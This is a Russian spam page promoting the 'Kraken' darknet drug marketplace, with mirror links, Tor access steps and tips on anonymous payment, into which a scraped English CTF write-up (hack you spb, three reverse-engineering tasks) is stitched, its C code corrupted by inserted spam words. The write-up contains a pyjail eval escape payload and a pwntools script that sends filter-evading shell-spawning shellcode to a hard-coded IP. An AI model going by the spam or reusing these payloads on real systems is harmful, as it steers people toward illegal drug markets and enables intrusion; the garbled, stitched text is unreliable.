Перейти на Kraken Вход на Kraken через TOR Вход на Kraken Telegram kra31.at kra31.cc kra32.at kra32.cc

Kraken17at

Kraken17at

This is my write-up for recent hack you spb CTF - a CTF for newbies. I guess I'm a bit older here ahaha.Reverse 100:#include <stdio.h>#include <string.h>int main() { char buf[64]; gets(buf); int l = кракен strlen(buf); if (l * l!= 144) return 1; unsigned int a = кракен buf[0] | (buf[4] << 8) | (buf[8] << 16); unsigned int b = buf[1] | (buf[5] << 8) | (buf[9] << 16); unsigned int c = buf[2] | (buf[6] << 8) | (buf[10] << 16); unsigned int d = buf[3] | (buf[7] << 8) | (buf[11] << 16); if (!(((a % 3571) == 2963) && (((a % 2843) == 215)) && (((a % 30243) == 13059)))) return 2; if (!(((b % 80735) == 51964) && (((b % 8681) == 2552)) && (((b % 40624) == 30931)))) return 3; if (!(((c % 99892) == 92228) && (((c % 45629) == 1080)) && (((c % 24497) == 12651)))) return 4; if (!(((d % 54750) == 26981) && (((d % 99627) == 79040)) && (((d % 84339) == 77510)))) return 5; printf("Congratulations %s is flag\n",buf); return 0;}First of all, I think about use something like z3, or any SAT that could give me the valid number. But z3 took a lot of time, so I decided to look deeper... Yes, you could finger out there is a pattern (x % number1 == number2), so you could apply Chinese remainder theorem to get a, b, c.Reverse 200:
This is a.pyc file, which is a file contain python byte-code. As usual, for byte-code relative problems, I search for some python byte-code decompiler and found pycdc.
After decompil, you should get something like this# Source Generated with Decompyle++# File: rev200_bot_7b541a1.pyc (Python 2.7)import configimport tracebackimport refrom base64 import *from twx.botapi import TelegramBot, ReplyKeyboardMarkup, ReplyKeyboardHidesec_state = { }def process_message(bot, u):Warning: Stack history is not empty! if u.message.sender and u.message.text and u.message.chat: chat_id = u.message.chat.id user = u.message.sender.username reply_hide = ReplyKeyboardHide.create() print 'user:%s mes:%s' % (user, u.message.text) if user not in sec_state: sec_state[user] = { 'mode': 15, 'stage': 7 } cmd1 = u.message.text.encode('utf-8') a = re.findall('(\\/\\w+)\\s*(.*)', cmd1) if a: cmd = a[0][0] data = a[0][1] if cmd == '/help': bot.send_message(chat_id, 'Usage: \n\n/help - show this help\n/enter - enter secret mode\n', reply_markup = reply_hide) if cmd == '/enter': keyboard = [ [ '-7-', '-8-', '-9-'], [ '-4-', '-5-', '-6-'], [ '-1-', '-2-', '-3-'], [ '-0-']] reply_markup = ReplyKeyboardMarkup.create(keyboard) bot.send_message(chat_id, 'please enter access code', reply_markup = reply_markup).wait() if sec_state[user]['mode'] == 0 and cmd == '/7779317': ddd = b64decode(data) bot.send_message(chat_id, eval(ddd)) a = re.findall('-(\\d+)-', cmd1) if a: num = a[0] if int(num) == sec_state[user]['stage']: sec_state[user]['stage'] = (sec_state[user]['stage'] * sec_state[user]['stage'] ^ 1337) % 10 sec_state[user]['mode'] = sec_state[user]['mode'] - 1 if sec_state[user]['mode'] < 0: sec_state[user]['mode'] = 0 if sec_state[user]['mode'] == 0: bot.send_message(chat_id, 'Secret mode enabled!', reply_markup = reply_hide).wait() else: print 'NO', num, sec_state[user]['stage'] bot.send_message(chat_id, 'Invalid password!', reply_markup = reply_hide).wait() sec_state[user]['mode'] = 15 bot = TelegramBot(config.token)bot.update_bot_info().wait()print bot.usernamelast_update_id = 0while True: updates = bot.get_updates(offset = last_update_id).wait() try: for update in updates: if int(update.update_id) > int(last_update_id): last_update_id = update.update_id process_message(bot, update) continue continue except Exception: ex = None print traceback.format_exc() continue So this is a kind of chat-bot server based on Telegram.
There is eval function inside, bot.send_message(chat_id, eval(ddd)), so I need to control ddd which is a base64 decoded string from data we sent. Before that, I need to enter Secret mode by enter correct access code (0-9).
First, set sec_state[user]['mode'] = 0; First time, stage init to 7, that changed everytime you press the correct key; But if I dont remember the stage, I still could find out by bruteforce from 0 to 9, if I didn't recv incorrect message that's mean I pressed the correct one; then by use the following script, I'm able to access secret area;#coding: utf-8sec_state = { }user = "A"sec_state[user] = {'mode': 15,'stage': 7 } # bruteforce numbersec_state[user]['mode'] = 15r = []while 1: num = sec_state[user]['stage'] r.append(num) print "-%d-" % num sec_state[user]['stage'] = (sec_state[user]['stage'] * sec_state[user]['stage'] ^ 1337) % 10 sec_state[user]['mode'] = sec_state[user]['mode'] - 1 if sec_state[user]['mode'] < 0: sec_state[user]['mode'] = 0 if sec_state[user]['mode'] == 0: breakprint sec_state[user]['mode']Next, this is a pyjail, so I can't execute normal python command...
So, final payload is `str(().__class__.__base__.__subclasses__()[40]("flag","r").read())`or `/7779317 c3RyKCgpLl9fY2xhc3NfXy5fX2Jhc2VfXy5fX3N1YmNsYXNzZXNfXygpWzQwXSgiZmxhZyIsInIiKS5yZWFkKCkp`Reverse 300:
Let's get some fun.let reverse this (or not?), look at handler (the main function)ssize_t __cdecl handler(int fd){ ssize_t result; // [email protected] unsigned int buf; // [sp+20h] [bp-18h]@1 int v3; // [sp+24h] [bp-14h]@1 char *v4; // [sp+28h] [bp-10h]@4 int v5; // [sp+2Ch] [bp-Ch]@4 buf = 0; setuid(0x3E8u); seteuid(0x3E8u); setgid(0x3E8u); setegid(0x3E8u); result = recv(fd, &buf, 4u, 0); v3 = result; if ( result == 4 ) { result = buf; if ( buf <= 0xC8 ) { v4 = (char *)mmap(0, buf, 7, 33, -1, 0); v3 = recv(fd, v4, buf, 0); result = crc32(0, v4, buf); v5 = result; if ( result == 0xCAFEBABE ) { result = filter(v4, buf) ^ 1; if (!(_BYTE)result ) result = ((int (*)(void))v4)(); } } } return result;}So the basic idea is make result == 0xCAFEBABE, so the program will execute v4 as shellcode (function pointer), but you also need to bypass the filter function - check if contain any of 0x0, 0x1, 0x2f, 0x68, 0x73 ( so I can't use sh in plaintext)then exit; So, I did the following step:1. Find a program that can make crc32 of my shellcode equal 0xCAFEBABE
2. Make a great shellcode and Bypass filter.
By search google for everything, the answer for problem 1 is force-crc32.
Currently I'm also trying to learn some binary exploit method, write a shellcode isn't hard (hint xor), but if there is any framework that's good enough as pwntools , you shoud try at least once.
Basicaly, I import pwns and let pwntools do the rest;from pwn import *import socket, struct, telnetlibdef getCRC(data): import subprocess with open('/tmp/12', 'wb') as f: f.write(data + "123456") subprocess.check_output(['python', 'forcecrc32.py', '/tmp/12', str(len(data)+1), 'CAFEBABE']) with open('/tmp/12', 'rb') as f: data = f.read() return datadef crc32(data):# recheck import zlib return (zlib.crc32(data)) & 0xffffffffd = ""d += asm(pwnlib.shellcraft.i386.linux.dup2(4,0))d += asm(pwnlib.shellcraft.i386.linux.dup2(4,1))# i need dup2 because the program use itself as serverd += asm(pwnlib.shellcraft.i386.linux.sh())fsc = pwnlib.encoders.encoder.encode(d, '\n\x01\0\x2f\x73\x68')print len(fsc)fsc = getCRC(fsc) # it didn't contain any blocked char, so i dont need to re-generate again.print hex(crc32(fsc))#yes, i love my custom socket lib 🙁s = socket.create_connection(("78.46.101.237", 3177))s.send(p32(len(fsc)))s.send(fsc)s.send("\n")s.send("cat flag*\n") print s.recv(1024)To be continued....Related

Kraken17at - Кракен сайт официальный kraken clear com

Данный сервер управляется панелью управления BrainyCP. Внимание! Что ж, есть несколько способов для того чтобы попасть на самый популярный тёмный рынок на территории стран СНГ. Они не смогут скрываться в даркнете или на форумах, они не смогут скрываться в России или где-то в других странах сказано в заявлении Минфина. Для Android есть его аналог под названием Orweb. Пользуйтесь на свой страх и риск. Переходник. 2 Как зайти с Андроид Со дня на день разработчики должны представить пользователям приложение Mega для Android. Многие из них не так эффективны, как хотелось. Matanga - такое название выбрал себе сайт авто-продаж психоактивных веществ в нашем любимом даркнете. GoosO_o Сегодня Норма VladiminaTOR Вчера Мега супер, сегодня с парнями скинулись на стафчик и взяли сразу побольше, спасибо за зеркала! Чтобы не задаваться вопросом, как пополнить баланс на Мега Даркнет, стоит завести себе криптовалютный кошелек и изучить момент пользования сервисами обмена крипты на реальные деньги и наоборот. Одним из самых простых способов войти в Мегу это использовать браузер Тор. Выбирайте любой понравившийся вам сайт, не останавливайтесь только на одном. Ни блог Навального, ни трекер Rutor. Правильная! Почему пользователи выбирают Mega? Ну, вот OMG m. Ссылка удалена по притензии роскомнадзора Ссылка удалена по притензии роскомнадзора Ссылка удалена по притензии роскомнадзора Ссылка удалена по притензии роскомнадзора Ссылка удалена по притензии роскомнадзора Ссылка удалена по притензии роскомнадзора psyco42coib33wfl. Важно знать, что ответственность за покупку на Gidra подобных изделий и продуктов остается на вас. Onion - onelon, анонимные блоги без цензуры. Частично хакнута, поосторожней. Заполните соответствующую форму и разгадайте хитрую капчу для входа в личный аккаунт: Чтобы проверочный код входа приобрёл более человеческий вид, потяните за голубой ползунок до тех пор пока не увидите знакомые символы. Onion - Candle, поисковик по Tor. Первый способ попасть на тёмную сторону всемирной паутины использовать Тор браузер. Независимый архив magnet-ссылок casesvrcgem4gnb5.onion - Cases. Onion - Pasta аналог pastebin со словесными идентификаторами. Фильтр товаров, личные сообщения, форум и многое другое за исключением игры в рулетку. Купить билет на самолет стало еще. Отмечено, что серьезным толчком в развитии магазина стала серия закрытий альтернативных проектов в даркнете. W3.org На этом сайте найдено 0 ошибки. Хорошая новость, для любых транзакций имеется встроенное 7dxhash шифрование, его нельзя перехватить по воздуху, поймать через wifi или Ethernet. У него даже есть адрес в клирнете, который до сих пор остается доступным с российского. Главный минус TunnelBear цена. 3дрaвcтвуйте! Russian Anonymous Marketplace один из крупнейших русскоязычных теневых форумов и торговая площадка. Проверка html разметки является важным шагом на пути к обеспечению технического качества веб-страниц, однако, не является полной мерой соответствия веб-стандартам. И все же лидирует по анонимности киви кошелек, его можно оформить на левый кошелек и дроп. Из-за того, что операционная система компании Apple имеет систему защиты, создать официальное приложение Mega для данной платформы невозможно. Onion - Enot сервис одноразовых записок, уничтожаются после просмотра. Немного подождав попадёте на страницу где нужно ввести проверочный код на Меге Даркнет. Доступ к darknet market с телефона или ПК давно уже не новость.

Kraken17at

К сожалению, требует включенный JavaScript. Onion сайты перешли на новые адреса версии. Проводить розыгрыши Будем держать вас в курсе событий нашего бренда. Как известно наши жизнь требует адреналина и новых ощущений, но как их получить, если многие вещи для получения таких ощущений запрещены. Относительно стабилен. Все города РФ и СНГ открываются перед вами как. Инструкция для использования OnionTor ссылок Для компьютера: Скачать TOR browser. Многие хотят воспользоваться услугами ОМГ ОМГ, но для этого нужно знать, как зайти на эту самую ОМГ, а сделать это немного сложнее, чем войти на обычный сайт светлого интернета. Иногда отключается на несколько часов. Onion актуальное Pasta аналог pastebin со словесными идентификаторами. Ранее на reddit значился как скам, сейчас пиарится известной зарубежной площадкой. SecureDrop разработан для того, чтобы осведомители могли безопасно и анонимно обмениваться информацией с журналистами. Что-то про аниме-картинки пок-пок-пок. Кракен оправдывает целиком и полностью. Этот вариант не позволяет Onion Browser обеспечивать такой же высокий уровень защиты приватности, как Tor Browser. Kraken БОТ Telegram Для покупки Вам понадобятся bitcoinы. Вот ссылка. Внимание! Стоит приостановить их деятельность или добавить анонимный браузер в список исключений. Главгосэкспертиза России выдала положительное заключение на проект и результаты. Причём недавно появились инструменты, которые продолжают эксплуатировать мощности вашего компьютера, даже когда вы закрыли браузер (остаётся невидимое окно). Внезапно много русских пользователей. Играть в покер онлайн на деньги через приложения: pppoker, upoker. Рабочие ссылки кракен krmp.cc. Подведем итог Даркнет штука интересная, опасная и, по большому счёту, большинству людей не нужная. После регистрации обязательно прочтите правила. Только в 2020 году продажи "Гидры" составили не менее 1,23 млрд евро, приводит статистику "Коммерсант".

Главная / Карта сайта

Кракен лучший маркетплейс

Kraken 23at

Kraken russia